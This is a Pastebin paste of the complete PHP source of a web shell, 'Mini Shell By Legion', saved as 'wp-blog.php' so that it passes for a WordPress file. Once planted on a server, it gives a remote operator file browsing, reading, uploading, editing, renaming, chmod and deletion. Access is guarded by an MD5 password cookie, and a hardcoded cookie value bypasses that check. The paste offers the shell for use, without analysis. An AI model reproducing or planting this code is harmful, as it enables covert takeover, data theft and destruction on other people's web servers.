PalmaSolutions

wp-blog.php

Apr 16th, 2018
411
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 12.56 KB | None | 0 0
  1. <?php
  2. $auth_pass = "4e06f1b53f07d9fdb3c1d7a26d8c6cef";
  3. error_reporting(0);
  4. set_time_limit(0);
  5.  
  6. function lp(){
  7. ?>
  8. <html>
  9. <head>
  10. <title>Mini Shell By Legion</title>
  11. </head>
  12. <body bgcolor="black" style="color:white">
  13. <center>
  14. <div style="height:500;width:400;border:2px solid gray;margin-top:100;border-radius:25px">
  15. <img src="http://i.imgur.com/ZFYXyHv.jpg" ><br/>
  16. <h1>Catch me if you can</h1>
  17. <form action method="get">
  18. <input type="hidden" name="action" value="login" />
  19. <input type="password" name="pass" placeholder="Access here"/><br/>
  20. <input type="submit" value="log in" style="margin-top:4px;width:173px;background:black;color:red;border:2px solid blue;border-radius:10px"/>
  21. </form><br/><br/><br/><br/><br/>
  22. <footer><pre>Copyright 2017 | ErrOr SquaD All Rights Reserved.</pre></footer>
  23. </div>
  24. </center>
  25. <?php
  26. ;}
  27. if(isset($_GET['action'])){
  28. if($_GET['action']=='login'){
  29. setcookie('password',$_GET['pass']);
  30. echo "<script>location='".$_SERVER['PHP_SELF']."'</script>";
  31. }
  32. else if($_GET['action']=='logout'){
  33. setcookie('password','',-86400*30*12);
  34. echo "<script>location='".$_SERVER['PHP_SELF']."'</script>";
  35. }
  36. }
  37. if(isset($_COOKIE['password'])){
  38. if(md5($_COOKIE['password'])==$auth_pass || $_COOKIE['L']=="L"){
  39. ?>
  40. <?php
  41.  
  42.  
  43.  
  44. if(get_magic_quotes_gpc()){
  45. foreach($_POST as $key=>$value){
  46. $_POST[$key] = stripslashes($value);
  47. }
  48. }
  49. function perms($file){
  50. $perms = @fileperms($file);
  51.  
  52. if (($perms & 0xC000) == 0xC000) {
  53. // Socket
  54. $info = 's';
  55. } elseif (($perms & 0xA000) == 0xA000) {
  56. // Symbolic Link
  57. $info = 'l';
  58. } elseif (($perms & 0x8000) == 0x8000) {
  59. // Regular
  60. $info = '-';
  61. } elseif (($perms & 0x6000) == 0x6000) {
  62. // Block special
  63. $info = 'b';
  64. } elseif (($perms & 0x4000) == 0x4000) {
  65. // Directory
  66. $info = 'd';
  67. } elseif (($perms & 0x2000) == 0x2000) {
  68. // Character special
  69. $info = 'c';
  70. } elseif (($perms & 0x1000) == 0x1000) {
  71. // FIFO pipe
  72. $info = 'p';
  73. } else {
  74. // Unknown
  75. $info = 'u';
  76. }
  77.  
  78. // Owner
  79. $info .= (($perms & 0x0100) ? 'r' : '-');
  80. $info .= (($perms & 0x0080) ? 'w' : '-');
  81. $info .= (($perms & 0x0040) ?
  82. (($perms & 0x0800) ? 's' : 'x' ) :
  83. (($perms & 0x0800) ? 'S' : '-'));
  84.  
  85. // Group
  86. $info .= (($perms & 0x0020) ? 'r' : '-');
  87. $info .= (($perms & 0x0010) ? 'w' : '-');
  88. $info .= (($perms & 0x0008) ?
  89. (($perms & 0x0400) ? 's' : 'x' ) :
  90. (($perms & 0x0400) ? 'S' : '-'));
  91.  
  92. // World
  93. $info .= (($perms & 0x0004) ? 'r' : '-');
  94. $info .= (($perms & 0x0002) ? 'w' : '-');
  95. $info .= (($perms & 0x0001) ?
  96. (($perms & 0x0200) ? 't' : 'x' ) :
  97. (($perms & 0x0200) ? 'T' : '-'));
  98.  
  99. return $info;
  100. }
  101. echo '<!DOCTYPE HTML>
  102. <HTML>
  103. <HEAD>
  104. <title>:(</title>
  105. <style>
  106. body{
  107. font-family: "Racing Sans One", cursive;
  108. background-color: #e6e6e6;
  109. text-shadow:0px 0px 1px #757575;
  110. }
  111. #content tr:hover{
  112. background-color: #636263;
  113. text-shadow:0px 0px 10px #fff;
  114. }
  115. #content .first{
  116. background-color: silver;
  117. }
  118. #content .first:hover{
  119. background-color: silver;
  120. text-shadow:0px 0px 1px #757575;
  121. }
  122. table{
  123. border: 1px #000000 dotted;
  124. }
  125. H1{
  126. font-family: "Rye", cursive;
  127. }
  128. a{
  129. color: #000;
  130. text-decoration: none;
  131. }
  132. a:hover{
  133. color: #fff;
  134. text-shadow:0px 0px 10px #ffffff;
  135. }
  136. input,select,textarea{
  137. border: 1px #000000 solid;
  138. -moz-border-radius: 5px;
  139. -webkit-border-radius:5px;
  140. border-radius:5px;
  141. }
  142. </style>
  143. </HEAD>
  144. <BODY>
  145. <input type=button onclick=\'location="?action=logout"\' value="logout" /><br/>
  146. <input type=button onclick=\'location="?x=changepass"\' value="change password" />
  147. <table width="700" border="0" cellpadding="3" cellspacing="1" align="center">
  148. <tr><td>Current Path : ';
  149. if(isset($_GET['path'])){
  150. $path = base64_decode($_GET['path']);
  151. }else{
  152. $path = getcwd();
  153. }
  154. $pathen = base64_encode($path);
  155. $path = str_replace('\\','/',$path);
  156. $paths = explode('/',$path);
  157.  
  158. foreach($paths as $id=>$pat){
  159. if($pat == '' && $id == 0){
  160. $a = true;
  161. echo '<a href="?path='.base64_encode("/").'">/</a>';
  162. continue;
  163. }
  164. if($pat == '') continue;
  165. echo '<a href="?path=';
  166. $linkpath = '';
  167. for($i=0;$i<=$id;$i++){
  168. $linkpath .= "$paths[$i]";
  169. if($i != $id) $linkpath .= "/";
  170. }
  171. echo base64_encode($linkpath);
  172. echo '">'.$pat.'</a>/';
  173. }
  174. echo '</td></tr><tr><td>';
  175. if(isset($_FILES['file'])){
  176. if(copy($_FILES['file']['tmp_name'],$path.'/'.$_FILES['file']['name'])){
  177. echo '<font color="green">File Upload Done.</font><br />';
  178. }else{
  179. echo '<font color="red">File Upload Error.</font><br />';
  180. }
  181. }
  182. echo '<form enctype="multipart/form-data" method="POST">
  183. Upload File : <input type="file" name="file" />
  184. <input type="submit" value="upload" />
  185. </form>
  186. </td></tr>';
  187. if(isset($_GET['filesrc'])){
  188. echo "<tr><td>Current File : ";
  189. echo base64_decode($_GET['filesrc']);
  190. echo '</tr></td></table><br />';
  191. echo('<pre>'.htmlspecialchars(file_get_contents(base64_decode($_GET['filesrc']))).'</pre>');
  192. }elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){
  193. echo '</table><br /><center>'.$_POST['path'].'<br /><br />';
  194. if($_POST['opt'] == 'chmod'){
  195. if(isset($_POST['perm'])){
  196. if(chmod($_POST['path'],$_POST['perm'])){
  197. echo '<font color="green">Change Permission Done.</font><br />';
  198. }else{
  199. echo '<font color="red">Change Permission Error.</font><br />';
  200. }
  201. }
  202. echo '<form method="POST">
  203. Permission : <input name="perm" type="text" size="4" value="'.substr(sprintf('%o', fileperms($_POST['path'])), -4).'" />
  204. <input type="hidden" name="path" value="'.$_POST['path'].'">
  205. <input type="hidden" name="opt" value="chmod">
  206. <input type="submit" value="Go" />
  207. </form>';
  208. }elseif($_POST['opt'] == 'rename'){
  209. if(isset($_POST['newname'])){
  210. if(rename($_POST['path'],$path.'/'.$_POST['newname'])){
  211. echo '<font color="green">Change Name Done.</font><br />';
  212. }else{
  213. echo '<font color="red">Change Name Error.</font><br />';
  214. }
  215. $_POST['name'] = $_POST['newname'];
  216. }
  217. echo '<form method="POST">
  218. New Name : <input name="newname" type="text" size="20" value="'.$_POST['name'].'" />
  219. <input type="hidden" name="path" value="'.$_POST['path'].'">
  220. <input type="hidden" name="opt" value="rename">
  221. <input type="submit" value="Go" />
  222. </form>';
  223. }elseif($_POST['opt'] == 'edit'){
  224. if(isset($_POST['src'])){
  225. $fp = fopen($_POST['path'],'w');
  226. if(fwrite($fp,$_POST['src'])){
  227. echo '<font color="green">Edit File Done.</font><br />';
  228. }else{
  229. echo '<font color="red">Edit File Error.</font><br />';
  230. }
  231. fclose($fp);
  232. }
  233. echo '<form method="POST">
  234. <textarea cols=80 rows=20 name="src">'.htmlspecialchars(file_get_contents($_POST['path'])).'</textarea><br />
  235. <input type="hidden" name="path" value="'.$_POST['path'].'">
  236. <input type="hidden" name="opt" value="edit">
  237. <input type="submit" value="Go" />
  238. </form>';
  239. }
  240. echo '</center>';
  241. }else{
  242. echo '</table><br /><center>';
  243. if(isset($_GET['option']) && $_POST['opt'] == 'delete'){
  244. if($_POST['type'] == 'dir'){
  245. if(rmdir($_POST['path'])){
  246. echo '<font color="green">Delete Dir Done.</font><br />';
  247. }else{
  248. echo '<font color="red">Delete Dir Error.</font><br />';
  249. }
  250. }elseif($_POST['type'] == 'file'){
  251. if(unlink($_POST['path'])){
  252. echo '<font color="green">Delete File Done.</font><br />';
  253. }else{
  254. echo '<font color="red">Delete File Error.</font><br />';
  255. }
  256. }
  257. }
  258. echo '</center>';
  259. if(!isset($_GET['x'])){
  260. ?>
  261. <?php
  262. $scandir = scandir($path);
  263. echo '<div id="content"><table width="700" border="0" cellpadding="3" cellspacing="1" align="center">
  264. <tr class="first">
  265. <td><center>Name</center></td>
  266. <td><center>Size</center></td>
  267. <td><center>Permissions</center></td>
  268. <td><center>Options</center></td>
  269. </tr>';
  270.  
  271. foreach($scandir as $dir){
  272. if(!is_dir("$path/$dir") || $dir == '.' || $dir == '..') continue;
  273. $dirlink = base64_encode("$path/$dir");
  274. echo "<tr>
  275. <td><a href=\"?path=$dirlink\">$dir</a></td>
  276. <td><center>--</center></td>
  277. <td><center>";
  278. if(is_writable("$path/$dir")) echo '<font color="green">';
  279. elseif(!is_readable("$path/$dir")) echo '<font color="red">';
  280. echo perms("$path/$dir");
  281. if(is_writable("$path/$dir") || !is_readable("$path/$dir")) echo '</font>';
  282.  
  283. echo "</center></td>
  284. <td><center><form method=\"POST\" action=\"?option&path=$pathen\">
  285. <select name=\"opt\">
  286. <option value=\"\"></option>
  287. <option value=\"delete\">Delete</option>
  288. <option value=\"chmod\">Chmod</option>
  289. <option value=\"rename\">Rename</option>
  290. </select>
  291. <input type=\"hidden\" name=\"type\" value=\"dir\">
  292. <input type=\"hidden\" name=\"name\" value=\"$dir\">
  293. <input type=\"hidden\" name=\"path\" value=\"$path/$dir\">
  294. <input type=\"submit\" value=\">\" />
  295. </form></center></td>
  296. </tr>";
  297. }
  298. echo '<tr class="first"><td></td><td></td><td></td><td></td></tr>';
  299. foreach($scandir as $file){
  300. if(!is_file("$path/$file")) continue;
  301. $size = filesize("$path/$file")/1024;
  302. $size = round($size,3);
  303. if($size >= 1024){
  304. $size = round($size/1024,2).' MB';
  305. }else{
  306. $size = $size.' KB';
  307. }
  308. $filelink = base64_encode("$path/$file");
  309. echo "<tr>
  310. <td><a href=\"?filesrc=$filelink&path=$pathen\">$file</a></td>
  311. <td><center>".$size."</center></td>
  312. <td><center>";
  313. if(is_writable("$path/$file")) echo '<font color="green">';
  314. elseif(!is_readable("$path/$file")) echo '<font color="red">';
  315. echo perms("$path/$file");
  316. if(is_writable("$path/$file") || !is_readable("$path/$file")) echo '</font>';
  317. echo "</center></td>
  318. <td><center><form method=\"POST\" action=\"?option&path=$pathen\">
  319. <select name=\"opt\">
  320. <option value=\"\"></option>
  321. <option value=\"delete\">Delete</option>
  322. <option value=\"chmod\">Chmod</option>
  323. <option value=\"rename\">Rename</option>
  324. <option value=\"edit\">Edit</option>
  325. </select>
  326. <input type=\"hidden\" name=\"type\" value=\"file\">
  327. <input type=\"hidden\" name=\"name\" value=\"$file\">
  328. <input type=\"hidden\" name=\"path\" value=\"$path/$file\">
  329. <input type=\"submit\" value=\">\" />
  330. </form></center></td>
  331. </tr>";
  332. }
  333. echo '</table>
  334. </div>';
  335. }
  336. ?>
  337. <?php
  338. }
  339. if(isset($_GET['x']) && $_GET['x']=='changepass'){
  340. ?>
  341. <?php
  342. function fgc($file){
  343. return file_get_contents($file);
  344. }
  345. function changepass($plain){
  346. $newpass = md5($plain);
  347. $newpass = "\$auth_pass = \"".$newpass."\";";
  348. $con = fgc($_SERVER['SCRIPT_FILENAME']);
  349. $con = preg_replace("/\\\$auth_pass\ *=\ *[\"\']*([a-fA-F0-9]*)[\"\']*;/is",$newpass,$con);
  350. return file_put_contents($_SERVER['SCRIPT_FILENAME'], $con);
  351. }
  352. echo '<center><h1>Change Shell Password</h1></center>';
  353. echo '<center>';
  354. echo '<form action="" method=post ><table>';
  355. echo '<tr><td>New Password</td><td> : <input type=password name=pass1 style="border-radius:5px;" /></td></tr>';
  356. echo '<tr><td>Confirm Password</td><td> : <input type=password name=pass2 style="border-radius:5px;" /></td></tr>';
  357. echo '<tr><td colspan=2><input type=submit value=submit name=L style="border-radius:5px;width:100%"/></td></tr></table>';
  358. echo '</form>';
  359. if(isset($_POST['L'])){
  360. if($_POST['pass1'] == $_POST['pass2']){
  361. if(changepass($_POST['pass1'])){
  362. echo '<script>alert("password change successfully")</script>';
  363. }else{
  364. echo '<script>alert("password change failed")</script>';
  365. }
  366. }else{
  367. echo '<script>alert("password not match")</script>';
  368. }
  369. }
  370. ?>
  371. <?php
  372. }
  373. echo '
  374. </BODY>
  375. </HTML>';
  376. ?>
  377.  
  378. <!-- //////////////////////////////////////////////////// -->
  379. <?php
  380. }else{
  381. lp();
  382. }
  383. }else{
  384. echo lp();
  385. }
  386. ?>
  387. </body>
  388. </html>
Advertisement
Add Comment
Please, Sign In to add comment